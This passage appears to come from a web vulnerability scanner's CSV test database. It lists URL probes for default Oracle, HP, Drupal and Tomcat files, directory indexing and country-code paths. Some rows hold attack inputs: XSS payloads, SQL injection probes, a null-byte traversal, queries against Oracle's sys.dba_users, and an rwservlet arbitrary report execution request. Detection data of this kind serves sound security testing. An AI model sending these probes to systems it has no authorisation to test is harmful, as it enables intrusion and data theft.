"003426","3233","13","/bmp/setconn.jsp","GET","200","","","","","SQLJ Demo Application","",""
"003427","3233","13","/ptg_upgrade_pkg.log","GET","200","","","","","Oracle log files.","",""
"003428","3233","13","/OA_HTML/oam/weboam.log","GET","200","","","","","Oracle log files.","",""
"003429","3233","1","/webapp/admin/_pages/_bc4jadmin/","GET","200","","","","","Oracle JSP files","",""
"003430","3233","1","/_pages/_webapp/_admin/_showpooldetails.java","GET","200","","","","","Oracle JSP files","",""
"003431","3233","1","/_pages/_webapp/_admin/_showjavartdetails.java","GET","200","","","","","Oracle JSP file","",""
"003432","3233","1","/_pages/_demo/","GET","200","","","","","Oracle JSP file","",""
"003433","3233","1","/_pages/_webapp/_jsp/","GET","200","","","","","Oracle JSP file.","",""
"003434","3233","1","/_pages/_demo/_sql/","GET","200","","","","","Oracle JSP file.","",""
"003435","3233","13","//OA_HTML/_pages/","GET","200","","","","","Oracle JSP file.","",""
"003436","3233","13","/OA_HTML/webtools/doc/index.html","GET","200","","","","","Cabo DHTML Components Help Page","",""
"003437","18114","8","/reports/rwservlet?server=repserv+report=/tmp/hacker.rdf+destype=cache+desformat=PDF","GET","200","","","",""," Oracle Reports rwservlet report Variable Arbitrary Report Executable Execution","",""
"003438","3233","1","/apex/","GET","200","","","","","Oracle Application Express login screen.","",""
"003439","3233","1b","/OA_JAVA/","GET","200","","","","","Oracle Applications Portal Page","",""
"003440","3233","1b","/OA_HTML/","GET","200","","","","","Oracle Applications Portal Page","",""
"003441","3233","1b","/aplogon.html","GET","200","","","","","Oracle Applications Portal Page","",""
"003442","3233","1b","/appdet.html","GET","200","","","","","Oracle Applications Portal Pages","",""
"003443","3233","1b","/servlets/weboam/oam/oamLogin","GET","200","","","","","Oracle Application Manager","",""
"003444","3233","1b","/OA_HTML/PTB/mwa_readme.htm","GET","200","","","","","Oracle Mobile Applications Industrial Server administration and configuration inerface","",""
"003445","3233","1b","/reports/rwservlet","GET","200","","","","","Oracle Reports","",""
"003446","3233","1b","/reports/rwservlet/showenv","GET","200","","","","","Oracle Reports","",""
"003447","3233","1b","/reports/rwservlet/showmap","GET","200","","","","","Oracle Reports","",""
"003448","3233","1b","/reports/rwservlet/showjobs","GET","200","","","","","Oracle Reports","",""
"003449","3233","1b","/reports/rwservlet/getjobid7?server=myrep","GET","200","","","","","Oracle Reports","",""
"003450","3233","1b","/reports/rwservlet/getjobid4?server=myrep","GET","200","","","","","Oracle Reports","",""
"003451","3233","1b","/reports/rwservlet/showmap?server=myserver","GET","200","","","","","Oracle Reports","",""
"003452","3093","1a","/pls/portal/owa_util.cellsprint?p_theQuery=select","GET","200","","","","","Direct access to Oracle packages could have an unkown impact.","",""
"003453","3093","1a","/pls/portal/owa_util.listprint?p_theQuery=select","GET","200","","","","","Access to Oracle pages could have an unknown impact.","",""
"003454","3093","1a","/pls/portal/owa_util.show_query_columns?ctable=sys.dba_users","GET","200","","","","","Access to Oracle pages could have an unknown impact.","",""
"003455","3093","1a","/pls/portal/owa_util.showsource?cname=owa_util","GET","200","","","","","Access to Oracle pages could have an unknown impact.","",""
"003456","3093","1a","/pls/portal/owa_util.cellsprint?p_theQuery=select+*+from+sys.dba_users","GET","200","","","","","Access to Oracle pages could have an unknown impact.					","",""
"003457","3093","1a","/pls/portal/owa_util.signature","GET","200","","","","","Access to Oracle pages could have an unknown impact.					","",""
"003458","3093","1a","/pls/portal/HTP.PRINT","GET","200","","","","","Access to Oracle pages could have an unknown impact.					","",""
"003459","3093","1a","/pls/portal/CXTSYS.DRILOAD.VALIDATE_STMT","GET","200","","","","","Access to Oracle pages could have an unknown impact.					","",""
"003460","3093","1a","/pls/portal/PORTAL_DEMO.ORG_CHART.SHOW","GET","200","","","","","Access to Oracle pages could have an unknown impact.					","",""
"003461","3093","1a","/pls/portal/PORTAL.wwv_form.genpopuplist","GET","200","","","","","Access to Oracle pages cold have an unknown impact.					","",""
"003462","3093","1a","/pls/portal/PORTAL.wwv_ui_lovf.show","GET","200","","","","","Access to Oracle pages could have an unknown impact.					","",""
"003463","3093","1a","/pls/portal/PORTAL.wwa_app_module.link","GET","200","","","","","Access to Oracle pages could have an unknown impact.					","",""
"003464","3093","1a","/pls/portal/PORTAL.wwv_dynxml_generator.show","GET","200","","","","","Access to Oracle pages could have an unknown impact.					","",""
"003465","3093","1a","/pls/portal/PORTAL.home","GET","200","","","","","Access to Oracle pages could have an unknown impact.					","",""
"003466","3093","1a","/pls/portal/PORTAL.wwv_setting.render_css","GET","200","","","","","Access to Oracle pages could have an unknown impact.					","",""
"003467","3093","1a","/pls/portal/PORTAL.wwv_main.render_warning_screen?p_oldurl=inTellectPRO&p_newurl=inTellectPRO","GET","200","","","","","Access to Oracle pages could have an unknown impact.					","",""
"003468","3093","1a","/pls/portal/SELECT","GET","200","","","","","Access to Oracle pages could have an unknown impact.					","",""
"003469","3093","1a","/pls/portal/null","GET","200","","","","","Access to Oracle pages could have an unknown impact.					","",""
"003470","3093","1b","/OA_MEDIA/","GET","200","","","","","Oracle Applications portal pages found.","",""
"003471","3093","1b","/OA_HTML/META-INF/","GET","200","","","","","Oracle Applications portal pages found.","",""
"003472","3093","1b","/OA_HTML/jsp/por/services/login.jsp","GET","200","","","","","Oracle Applications portal pages found.","",""
"003473","3093","1b","/OA_HTML/PTB/ICXINDEXBASECASE.htm","GET","200","","","","","Oracle Applications portal pages found.","",""
"003474","3093","1b","/OA_HTML/PTB/ECXOTAPing.htm","GET","200","","","","","Oracle Applications portal pages found.","",""
"003475","3093","1b","/OA_HTML/PTB/xml_sample1.htm","GET","200","","","","","Oracle Applications portal pages found.","",""
"003476","3093","1b","/OA_HTML/jsp/wf/WFReassign.jsp","GET","200","","","","","Oracle Applications portal pages found.","",""
"003477","3093","1b","/OA_JAVA/Oracle/","GET","200","","","","","Oracle Applications portal pages found.","",""
"003478","3093","1b","/OA_JAVA/servlet.zip","GET","200","","","","","Oracle Applications portal pages found.","",""
"003479","3093","1b","/OA_JAVA/oracle/forms/registry/Registry.dat","GET","200","","","","","Oracle Applications portal pages found.","",""
"003480","3093","1b","/OA_HTML/oam/","GET","200","","","","","Oracle Applications portal pages found.","",""
"003481","3233","1b","/OA_HTML/jsp/","GET","200","","","","","Oracle Applications portal page found","",""
"003482","3233","1b","/OA_HTML/jsp/fnd/fndversion.jsp","GET","200","","","","","Oracle Applications help page found.","",""
"003483","3233","1b","/OA_HTML/jsp/fnd/fndhelp.jsp?dbc=/u01/oracle/prodappl/fnd/11.5.0/secure/dbprod2_prod.dbc","GET","200","","","","","Oracle Applications help page found.					","",""
"003484","3233","1b","/OA_HTML/jsp/fnd/fndhelputil.jsp","GET","200","","","","","Oracle Applications help page found.","",""
"003485","3092","1","/install/install.php","GET","200","","","","","Install file found.","",""
"003486","67","3","/_vti_bin/shtml.dll/_vti_rpc","POST","The user","","","","","The anonymous FrontPage user is revealed through a crafted POST.","method=open+service%3a3%2e0%2e2%2e1105&service%5fname=%2f",""
"003487","3092","3","/cehttp/trace","GET","200","","","","","Sterling Commerce Connect Direct trace log file may contain user ID information.","",""
"003488","3092","3","/cehttp/property/","GET","200","","","","","Sterling Commerce Connect Direct configuration files.","",""
"003489","3092","b","/webdav/index.html","GET","WebDAV support","","","","","WebDAV support is enabled.","",""
"003490","3268","2","/hp-ux/","GET","[Ii]ndex [Oo]f ","","","","","Directory indexing found.","",""
"003491","3092","13b","/hp_docs/","GET","web server suite","","","","","HP-UX Web Server Suite was found.","",""
"003492","3092","13b","/hp_docs/cgi-bin/index.cgi","GET","web server suite","","","","","HP-UX Web Server Suite was found.","",""
"003493","3268","2","/hp_docs/xmltools/","GET","[Ii]ndex [Oo]f ","","","","","Directory indexing found. HP-UX Web Server Suite xml tools.","",""
"003494","3092","3","@CGIDIRSshowuser.cgi","GET","Username","","","","","Shows the output of the 'whoami' command, which shows the web server user.","",""
"003495","3092","1","@CGIDIRSman2html","GET","manual page","","","","","Gateway to Unix man pages.","",""
"003496","3092","3","/status?full=true","GET","Tomcat Status","","","","","Apache Tomcat and/or JBoss information page.","",""
"003497","35935","4","/rpc.php?q=\"><script>alert(document.cookie)</script>","GET","<script>alert\(document\.cookie\)<\/script>","","","","","Unobtrusive Ajax Star Rating Bar is vulnerable to XSS in the q variable.","",""
"003499","35933","9","/db.php?q='&t='","GET","MySQL server version","","","","","Unobtrusive Ajax Star Rating Bar db.php is vulnerable to SQL injection in the q and t variables.","",""
"003500","35934","9","/rpc.php?q='&t='","GET","MySQL server version","","","","","Unobtrusive Ajax Star Rating Bar rpc.php is vulnerable to SQL injection in the q and t variables.","",""
"003501","3233","b","/junk.cfm","GET","BlueDragon Time","","","","","Server is running BlueDragon from New Atlanta for CFML processing.","",""
"003502","3233","1","/jsp-examples/","GET","Java Server Pages","","","","","Apache Java Server Pages documentation.","",""
"003503","3233","b","/nps/iManager.html","GET","200","","","","","Novell iManager found.","",""
"003504","3233","3b","/nps/version.jsp","GET","200","","","","","Novell iManager version found.","",""
"003505","3233","3b","/nps/servlet/webacc?taskId=dev.Empty&merge=fw.About","GET","200","","","","","Novell iManager version found.","",""
"003506","3268","2","/doc/Judy/demo/","GET","[Ii]ndex [Oo]f ","","","","","Directory indexing found. HP Judy language demos.","",""
"003508","3268","2","/doc/vxvm/","GET","[Ii]ndex [Oo]f ","","","","","Directory indexing found. HP help documentation.","",""
"003509","3233","2","/doc/PRINTER-JPN-S","GET","HPDPS","","","","","HP DPS","",""
"003510","3233","2","/doc/PRINTER-JPN-E","GET","HPDPS","","","","","HP DPS","",""
"003511","3233","2","/doc/NTP_Primer.txt","GET","Network Time","","","","","HP server documentation.","",""
"003512","3233","2","/doc/LICENSE.SMAIL893","GET","license terms","","","","","HP server license document.","",""
"003513","3233","2","/doc/PRINT-ASE-NOTE","GET","Obsolescence","","","","","HP server documentation.","",""
"003514","3233","2","/doc/SETNETLP_Guide-E","GET","Configurable Parameters","","","","","HP server documentation.","",""
"003515","3233","2","/doc/SETNETLP_Guide-S","GET","Configurable Parameters","","","","","HP server documentation.","",""
"003516","3233","2","/doc/dir.perm.txt","GET","part of this patch","","","","","HP server documentation.","",""
"003517","3233","2","/doc/ASX-UTF8","GET","Asian System","","","","","HP server documentation.","",""
"003518","3233","2","/doc/ASX-TCH","GET","Release Note","","","","","HP server documentation.","",""
"003519","3233","2","/doc/ASX-SCH","GET","Release Note","","","","","HP server documentation.","",""
"003520","3233","2","/doc/ASX-KOR","GET","Release Note","","","","","HP server documentation.","",""
"003521","3233","2","/doc/ASX-JPN-S","GET","Asian-Core","","","","","HP server documentation.","",""
"003522","3233","2","/doc/ASX-JPN-E","GET","Asian-Core","","","","","HP server documentation.","",""
"003523","3233","2","/doc/ASX-JPN","GET","Release Note","","","","","HP server documentation.","",""
"003524","3233","2","/doc/11iSRB.txt","GET","Release Bulletin","","","","","HP server documentation.","",""
"003525","3233","2","/doc/11iRelNotes.txt","GET","Release Notes","","","","","HP server documentation.","",""
"003526","3233","2","/doc/11iRelNotes.html","GET","Release Notes","","","","","HP server documentation.","",""
"003527","3233","2","/doc/11.00RelNotes","GET","Release Notes","","","","","HP server documentation.","",""
"003528","3268","2","/doc/Judy/","GET","[Ii]ndex [Oo]f ","","","","","Directory indexing found. HP server Judy documentation.","",""
"003529","3268","2","/doc/TechPrtServ/","GET","[Ii]ndex [Oo]f ","","","","","Directory indexing found. HP Documentation.","",""
"003530","3233","2","/doc/sw_patches.txt","GET","HP 9000 Series","","","","","HP server documentation.","",""
"003531","3233","2","/doc/Judy/COPYRIGHT","GET","Trademark Notice","","","","","HP server documentation.","",""
"003532","3233","2","/doc/Judy/Judy1_3x.htm","GET","Judy1 macros","","","","","HP server Judy documentation.","",""
"003533","3233","2","/doc/Judy/Judy1_funcs_3x.htm","GET","Judy1 functions","","","","","HP server Judy documentation.","",""
"003534","3233","2","/doc/Judy/JudyL_funcs_3x.htm","GET","Judy1 functions","","","","","HP server Judy documentation.","",""
"003535","3233","2","/doc/Judy/JudySL_funcs_3x.htm","GET","JudySL functions","","","","","HP server Judy documentation.","",""
"003536","3233","2","/doc/Judy/Judy_3x.htm","GET","Judy functions","","","","","HP server Judy documentation.","",""
"003537","3233","2","/doc/Judy/JudySL_3x.htm","GET","JudySL macros","","","","","HP server Judy documentation.","",""
"003538","3233","2","/doc/Judy/JudyL_3x.htm","GET","JudyL macros","","","","","HP server Judy documentation.","",""
"003539","3233","2","/doc/Judy/LICENSE","GET","Software License","","200","","","HP server Judy documentation.","",""
"003540","3233","2","/doc/Judy/demo/JudySort.c","GET","static char","","","","","HP server Judy code.","",""
"003541","3233","2","/doc/Judy/demo/Makefile","GET","libJudy\.a","","","","","HP server Judy code.","",""
"003542","3233","2","/doc/Judy/demo/funhist.c","GET","FUNCTION HISTOGRAM","","","","","HP server Judy code.","",""
"003543","3233","2","/doc/Judy/demo/interSL.c","GET","INTERACTIVE JUDYSL","","","","","HP server Judy code.","",""
"003544","3233","2","/doc/icodUserGuide.pdf","GET","200","","","","","Instant Capacity on Demand (iCOD) Userís Guide.","",""
"003545","3233","2","/doc/planning_SuperDome_configs.pdf","GET","200","","","","","Planning HP SuperDome Configurations","",""
"003546","3233","2","/doc/vxvm/pitc_ag.pdf","GET","200","","","","","VERITAS FlashSnapTM Point-In-Time Copy Solutions documentation.","",""
"003547","3233","2","/doc/Judy/Judy_tech_book.pdf","GET","200","","","","","HP Judy documentation found.","",""
"003548","3233","2","/doc/vxvm/vxvm_ag.pdf","GET","200","","","","","Veritas Volume Manager documentation.","",""
"003549","3233","2","/doc/vxvm/vxvm_hwnotes.pdf","GET","200","","","","","Veritas Volume Manager documentation.","",""
"003550","3233","2","/doc/vxvm/vxvm_ig.pdf","GET","200","","","","","Veritas Volume Manager documentation.","",""
"003551","3233","2","/doc/vxvm/vxvm_mig.pdf","GET","200","","","","","Veritas Volume Manager documentation.","",""
"003552","3233","2","/doc/vxvm/vxvm_tshoot.pdf","GET","200","","","","","Veritas Volume Manager documentation.","",""
"003553","3233","2","/doc/vxvm/vxvm_notes.pdf","GET","200","","","","","Veritas Volume Manager documentation.","",""
"003554","3233","2","/doc/vxvm/vxvm_ug.pdf","GET","200","","","","","Veritas Volume Manager documentation.","",""
"003555","3092","1","/staging/","GET","200","","","","","This may be interesting...","",""
"003556","3092","1","/_archive/","GET","200","","","","","Archive found.","",""
"003557","3268","12","/pdfs/","GET","[Ii]ndex [Oo]f ","","","","","Directory indexing found.","",""
"003558","3093","0","@FCKEDITOReditor/filemanager/upload/test.html","GET","Custom Uploader","","","","","FCKeditor could allow files to be updated or edited by remote attackers.","",""
"003559","3093","0","@FCKEDITOReditor/dialog/fck_image.html","GET","Short Description","","","","","FCKeditor could allow files to be updated or edited by remote attackers.","",""
"003560","3093","0","@FCKEDITOReditor/filemanager/browser/default/connectors/test.html","GET","Connector","","","","","FCKeditor could allow files to be updated or edited by remote attackers.","",""
"003561","3093","0","@FCKEDITOReditor/dialog/fck_flash.html","GET","Preview","","","","","FCKeditor could allow files to be updated or edited by remote attackers.","",""
"003562","3093","0","@FCKEDITOReditor/dialog/fck_link.html","GET","Link Properties","","","","","FCKeditor could allow files to be updated or edited by remote attackers.","",""
"003563","3093","0","@FCKEDITOReditor/filemanager/browser/default/connectors/asp/connector.asp","GET","text editor for","","","","","FCKeditor could allow files to be updated or edited by remote attackers.","",""
"003564","3268","2","/crm/","GET","[Ii]ndex [Oo]f ","","","","","Directory indexing found.","",""
"003565","3268","2","/static/","GET","[Ii]ndex [Oo]f ","","","","","Directory indexing found.","",""
"003566","3268","2","/w3c/","GET","[Ii]ndex [Oo]f ","","","","","Directory indexing found.","",""
"003567","3268","2","/dynamic/","GET","[Ii]ndex [Oo]f ","","","","","Directory indexing found.","",""
"003568","3233","b","/update.php","GET","access_check","","","","","Drupal's update.php was found.","",""
"003569","3092","1","/INSTALL.txt","GET","200","","","","","Default file found.","",""
"003570","3092","1","/UPGRADE.txt","GET","200","","","","","Default file found.","",""
"003571","3092","b","/install.php","GET","already installed","","","","","Drupal install.php file found.","",""
"003572","3092","1","/install.php","GET","200","","","","","install.php file found.","",""
"003573","3092","1b","/LICENSE.txt","GET","200","","","","","License file found may identify site software.","",""
"003574","3092","1b","/upgrade.php","GET","200","","","","","upgrade.php was found.","",""
"003575","3092","1","/xmlrpc.php","GET","200","","","","","xmlrpc.php was found.","",""
"003576","3092","1b","/CHANGELOG.txt","GET","200","","","","","A changelog was found.","",""
"003577","3233","b","/INSTALL.mysql.txt","GET","CREATE THE","","","","","Drupal installation file found.","",""
"003578","3233","b","/INSTALL.pgsql.txt","GET","CREATE THE","","","","","Drupal installation file found.","",""
"003579","3233","b","/MAINTAINERS.txt","GET","CREATE THE","","","","","Drupal maintainers file found.","",""
"003580","3093","23b","/sites/default/settings.php","GET","site-specific configuration","","","","","The Drupal settings.php file is sent in plain text not parsed by PHP. This file may contain a database connection string.","",""
"003581","38580","7","@CGIDIRSc32web.exe/GetImage?ImageName=CustomerEmail.txt%00.pdf ","GET","200","","","","","Cart32 contains a null byte directory traversal in the ImageName variable.","",""
"003582","3092","3","/sitemap.gz","GET","200","","","","","The sitemap.gz file, used for Google indexing, contains an xml representation of the web site's structure.","",""
"003583","3092","3","/content/sitemap.gz","GET","200","","","","","The sitemap.gz file, used for Google indexing, contains an xml representation of the web site\'s structure.","",""
"003584","3233","b","/icons/README","GET","Public Domain Icons","","","","","Apache default file found.","",""
"003585","3092","b","/localstart.asp","GET","Object moved","","","","","Default IIS install page found.","",""
"003586","0","b","/ampache/update.php","GET","Ampache Update","","","","","Ampache update page is visible.","",""
"003587","0","b","/ampache/login.php","GET","Ampache :: Pour l\&#039;Amour de la Musique","","","","","Ampache is installed.","",""
"003588","0","b","/ampache/docs/README","GET","README - Ampache","","","","","Ampache installation documents found.","",""
"003589","0","b","/cgi-bin/webcgi/about","GET","\/cgi\/locale\/about_en\.xsl","","","","","Host seems to be a Dell Remote Access Controller (RAC).","",""
"003590","0","b","/webservices/IlaWebServices","GET","200","","","","","Host has the Oracle iLearning environment installed.","",""
"003591","0","a","/SoundBridgeStatus.html","GET","200","","SoundBridge is running software version","","","Host is running the SoundBridge web server which doesn't support identification.","",""
"003592","54339","4b","@CGIDIRSFormMail.pl","GET","Version 1\.92","","","","","Matt Wright's FormMail 1.92 is vulnerable to HTTP response splitting and Cross-Site Scripting","",""
"003592","0","b","/CFIDE/componentutils/cfcexplorer.cfc","GET","Component Browser Login","","","","","ColdFusion Component Browser. Default password may be 'admin'.","",""
"003593","0","1","/phone/","GET","200","","","","","This may be interesting...","",""
"003594","0","b","/Host/Portals/tabid/19/ctl/Login/portalid/0/Default.aspx","GET","dnn_ctr-1_Signin_txtUsername","","","","","DotNetNuke is running on the web server.","",""
"003595","34879","24","/jsp-examples/jsp2/jspx/textRotate.jspx?name=<script>alert(111)</script>","GET","<script>alert\(111\)<\/script>","","","","","The tomcat demo files are installed, which are vulnerable to an XSS attack","",""
"003596","34878","24","/jsp-examples/jsp2/el/implicit-objects.jsp?foo=<script>alert(112)</script>","GET","<script>alert\(112\)<\/script>","","","","","The tomcat demo files are installed, which are vulnerable to an XSS attack","",""
"003597","12721","24","/jsp-examples/jsp2/el/functions.jsp?foo=<script>alert(113)</script>","GET","<script>alert\(113\)<\/script>","","","","","The Tomcat demo files are installed, which are vulnerable to an XSS attack","",""
"003598","0","b","/aspnet_files/","GET","403","[Ii]ndex [Oo]f ","","","",".NET client side script files indicate .NET may be running. See http://msdn.microsoft.com/en-us/library/aa479045.aspx#aspplusvalid_clientside","",""
"003599","3092","1","/Admin/","GET","200","Directory Listing Denied","","","","This might be interesting...","",""
"003600","3092","1","/af/","GET","200","","","","","This might be interesting... potential country code (Afghanistan)","",""
"003601","3092","1","/ax/","GET","200","","","","","This might be interesting... potential country code (Aland Islands)","",""
"003602","3092","1","/al/","GET","200","","","","","This might be interesting... potential country code (Albania)","",""
"003603","3092","1","/dz/","GET","200","","","","","This might be interesting... potential country code (Algeria)","",""
"003604","3092","1","/as/","GET","200","","","","","This might be interesting... potential country code (American Samoa)","",""
"003605","3092","1","/ad/","GET","200","","","","","This might be interesting... potential country code (Andorra)","",""
"003606","3092","1","/ao/","GET","200","","","","","This might be interesting... potential country code (Angola)","",""
"003607","3092","1","/ai/","GET","200","","","","","This might be interesting... potential country code (Anguilla)","",""
"003608","3092","1","/aq/","GET","200","","","","","This might be interesting... potential country code (Antarctica)","",""
"003609","3092","1","/ag/","GET","200","","","","","This might be interesting... potential country code (Antigua And Barbuda)","",""
"003610","3092","1","/ar/","GET","200","","","","","This might be interesting... potential country code (Argentina)","",""
"003611","3092","1","/am/","GET","200","","","","","This might be interesting... potential country code (Armenia)","",""
"003612","3092","1","/aw/","GET","200","","","","","This might be interesting... potential country code (Aruba)","",""
"003613","3092","1","/au/","GET","200","","","","","This might be interesting... potential country code (Australia)","",""
"003614","3092","1","/at/","GET","200","","","","","This might be interesting... potential country code (Austria)","",""
"003615","3092","1","/az/","GET","200","","","","","This might be interesting... potential country code (Azerbaijan)","",""
"003616","3092","1","/bs/","GET","200","","","","","This might be interesting... potential country code (Bahamas)","",""
"003617","3092","1","/bh/","GET","200","","","","","This might be interesting... potential country code (Bahrain)","",""
"003618","3092","1","/bd/","GET","200","","","","","This might be interesting... potential country code (Bangladesh)","",""
"003619","3092","1","/bb/","GET","200","","","","","This might be interesting... potential country code (Barbados)","",""
"003620","3092","1","/by/","GET","200","","","","","This might be interesting... potential country code (Belarus)","",""
"003621","3092","1","/be/","GET","200","","","","","This might be interesting... potential country code (Belgium)","",""
"003622","3092","1","/bz/","GET","200","","","","","This might be interesting... potential country code (Belize)","",""
"003623","3092","1","/bj/","GET","200","","","","","This might be interesting... potential country code (Benin)","",""
"003624","3092","1","/bm/","GET","200","","","","","This might be interesting... potential country code (Bermuda)","",""
"003625","3092","1","/bt/","GET","200","","","","","This might be interesting... potential country code (Bhutan)","",""
"003626","3092","1","/bo/","GET","200","","","","","This might be interesting... potential country code (Bolivia)","",""
"003627","3092","1","/ba/","GET","200","","","","","This might be interesting... potential country code (Bosnia And Herzegovina)","",""
"003628","3092","1","/bw/","GET","200","","","","","This might be interesting... potential country code (Botswana)","",""
"003629","3092","1","/bv/","GET","200","","","","","This might be interesting... potential country code (Bouvet Island)","",""
"003630","3092","1","/br/","GET","200","","","","","This might be interesting... potential country code (Brazil)","",""
"003631","3092","1","/io/","GET","200","","","","","This might be interesting... potential country code (British Indian Ocean Territory)","",""
"003632","3092","1","/bn/","GET","200","","","","","This might be interesting... potential country code (Brunei Darussalam)","",""
"003633","3092","1","/bg/","GET","200","","","","","This might be interesting... potential country code (Bulgaria)","",""
"003634","3092","1","/bf/","GET","200","","","","","This might be interesting... potential country code (Burkina Faso)","",""
"003635","3092","1","/bi/","GET","200","","","","","This might be interesting... potential country code (Burundi)","",""
"003636","3092","1","/kh/","GET","200","","","","","This might be interesting... potential country code (Cambodia)","",""
"003637","3092","1","/cm/","GET","200","","","","","This might be interesting... potential country code (Cameroon)","",""
"003638","3092","1","/ca/","GET","200","","","","","This might be interesting... potential country code (Canada)","",""
"003639","3092","1","/cv/","GET","200","","","","","This might be interesting... potential country code (Cape Verde)","",""
"003640","3092","1","/ky/","GET","200","","","","","This might be interesting... potential country code (Cayman Islands)","",""
"003641","3092","1","/cf/","GET","200","","","","","This might be interesting... potential country code (Central African Republic)","",""
"003642","3092","1","/td/","GET","200","","","","","This might be interesting... potential country code (Chad)","",""
"003643","3092","1","/cl/","GET","200","","","","","This might be interesting... potential country code (Chile)","",""
"003644","3092","1","/cn/","GET","200","","","","","This might be interesting... potential country code (China)","",""
"003645","3092","1","/cx/","GET","200","","","","","This might be interesting... potential country code (Christmas Island)","",""
"003646","3092","1","/cc/","GET","200","","","","","This might be interesting... potential country code (Cocos (keeling) Islands)","",""
"003647","3092","1","/co/","GET","200","","","","","This might be interesting... potential country code (Colombia)","",""
"003648","3092","1","/km/","GET","200","","","","","This might be interesting... potential country code (Comoros)","",""
"003649","3092","1","/cg/","GET","200","","","","","This might be interesting... potential country code (Congo)","",""
"003650","3092","1","/cd/","GET","200","","","","","This might be interesting... potential country code (The Democratic Republic Of The Congo)","",""
"003651","3092","1","/ck/","GET","200","","","","","This might be interesting... potential country code (Cook Islands)","",""
"003652","3092","1","/cr/","GET","200","","","","","This might be interesting... potential country code (Costa Rica)","",""
"003653","3092","1","/ci/","GET","200","","","","","This might be interesting... potential country code (CÔte D'ivoire)","",""
"003654","3092","1","/hr/","GET","200","","","","","This might be interesting... potential country code (Croatia)","",""
"003655","3092","1","/cu/","GET","200","","","","","This might be interesting... potential country code (Cuba)","",""
"003656","3092","1","/cy/","GET","200","","","","","This might be interesting... potential country code (Cyprus)","",""
"003657","3092","1","/cz/","GET","200","","","","","This might be interesting... potential country code (Czech Republic)","",""
"003658","3092","1","/dk/","GET","200","","","","","This might be interesting... potential country code (Denmark)","",""
"003659","3092","1","/dj/","GET","200","","","","","This might be interesting... potential country code (Djibouti)","",""
"003660","3092","1","/dm/","GET","200","","","","","This might be interesting... potential country code (Dominica)","",""
"003661","3092","1","/do/","GET","200","","","","","This might be interesting... potential country code (Dominican Republic)","",""
"003662","3092","1","/ec/","GET","200","","","","","This might be interesting... potential country code (Ecuador)","",""
"003663","3092","1","/eg/","GET","200","","","","","This might be interesting... potential country code (Egypt)","",""
"003664","3092","1","/sv/","GET","200","","","","","This might be interesting... potential country code (El Salvador)","",""
"003665","3092","1","/gq/","GET","200","","","","","This might be interesting... potential country code (Equatorial Guinea)","",""
"003666","3092","1","/er/","GET","200","","","","","This might be interesting... potential country code (Eritrea)","",""
"003667","3092","1","/ee/","GET","200","","","","","This might be interesting... potential country code (Estonia)","",""
"003668","3092","1","/et/","GET","200","","","","","This might be interesting... potential country code (Ethiopia)","",""
"003669","3092","1","/fk/","GET","200","","","","","This might be interesting... potential country code (Falkland Islands (malvinas))","",""
"003670","3092","1","/fo/","GET","200","","","","","This might be interesting... potential country code (Faroe Islands)","",""
"003671","3092","1","/fj/","GET","200","","","","","This might be interesting... potential country code (Fiji)","",""
"003672","3092","1","/fi/","GET","200","","","","","This might be interesting... potential country code (Finland)","",""
"003673","3092","1","/fr/","GET","200","","","","","This might be interesting... potential country code (France)","",""
"003674","3092","1","/gf/","GET","200","","","","","This might be interesting... potential country code (French Guiana)","",""
"003675","3092","1","/pf/","GET","200","","","","","This might be interesting... potential country code (French Polynesia)","",""
"003676","3092","1","/tf/","GET","200","","","","","This might be interesting... potential country code (French Southern Territories)","",""
"003677","3092","1","/ga/","GET","200","","","","","This might be interesting... potential country code (Gabon)","",""
"003678","3092","1","/gm/","GET","200","","","","","This might be interesting... potential country code (Gambia)","",""
"003679","3092","1","/ge/","GET","200","","","","","This might be interesting... potential country code (Georgia)","",""
"003680","3092","1","/de/","GET","200","","","","","This might be interesting... potential country code (Germany)","",""
"003681","3092","1","/gh/","GET","200","","","","","This might be interesting... potential country code (Ghana)","",""
"003682","3092","1","/gi/","GET","200","","","","","This might be interesting... potential country code (Gibraltar)","",""
"003683","3092","1","/gr/","GET","200","","","","","This might be interesting... potential country code (Greece)","",""
"003684","3092","1","/gl/","GET","200","","","","","This might be interesting... potential country code (Greenland)","",""
"003685","3092","1","/gd/","GET","200","","","","","This might be interesting... potential country code (Grenada)","",""
"003686","3092","1","/gp/","GET","200","","","","","This might be interesting... potential country code (Guadeloupe)","",""
"003687","3092","1","/gu/","GET","200","","","","","This might be interesting... potential country code (Guam)","",""
"003688","3092","1","/gt/","GET","200","","","","","This might be interesting... potential country code (Guatemala)","",""
"003689","3092","1","/gg/","GET","200","","","","","This might be interesting... potential country code (Guernsey)","",""
"003690","3092","1","/gn/","GET","200","","","","","This might be interesting... potential country code (Guinea)","",""
"003691","3092","1","/gw/","GET","200","","","","","This might be interesting... potential country code (Guinea-bissau)","",""
"003692","3092","1","/gy/","GET","200","","","","","This might be interesting... potential country code (Guyana)","",""
"003693","3092","1","/ht/","GET","200","","","","","This might be interesting... potential country code (Haiti)","",""
"003694","3092","1","/hm/","GET","200","","","","","This might be interesting... potential country code (Heard Island And Mcdonald Islands)","",""
"003695","3092","1","/va/","GET","200","","","","","This might be interesting... potential country code (Holy See (vatican City State))","",""
"003696","3092","1","/hn/","GET","200","","","","","This might be interesting... potential country code (Honduras)","",""
"003697","3092","1","/hk/","GET","200","","","","","This might be interesting... potential country code (Hong Kong)","",""
"003698","3092","1","/hu/","GET","200","","","","","This might be interesting... potential country code (Hungary)","",""
"003699","3092","1","/is/","GET","200","","","","","This might be interesting... potential country code (Iceland)","",""
"003700","3092","1","/in/","GET","200","","","","","This might be interesting... potential country code (India)","",""
"003701","3092","1","/id/","GET","200","","","","","This might be interesting... potential country code (Indonesia)","",""
"003702","3092","1","/ir/","GET","200","","","","","This might be interesting... potential country code (Islamic Republic Of Iran)","",""
"003703","3092","1","/iq/","GET","200","","","","","This might be interesting... potential country code (Iraq)","",""
"003704","3092","1","/ie/","GET","200","","","","","This might be interesting... potential country code (Ireland)","",""
"003705","3092","1","/im/","GET","200","","","","","This might be interesting... potential country code (Isle Of Man)","",""
"003706","3092","1","/il/","GET","200","","","","","This might be interesting... potential country code (Israel)","",""
"003707","3092","1","/it/","GET","200","","","","","This might be interesting... potential country code (Italy)","",""
"003708","3092","1","/jm/","GET","200","","","","","This might be interesting... potential country code (Jamaica)","",""
"003709","3092","1","/jp/","GET","200","","","","","This might be interesting... potential country code (Japan)","",""
"003710","3092","1","/je/","GET","200","","","","","This might be interesting... potential country code (Jersey)","",""
"003711","3092","1","/jo/","GET","200","","","","","This might be interesting... potential country code (Jordan)","",""
"003712","3092","1","/kz/","GET","200","","","","","This might be interesting... potential country code (Kazakhstan)","",""
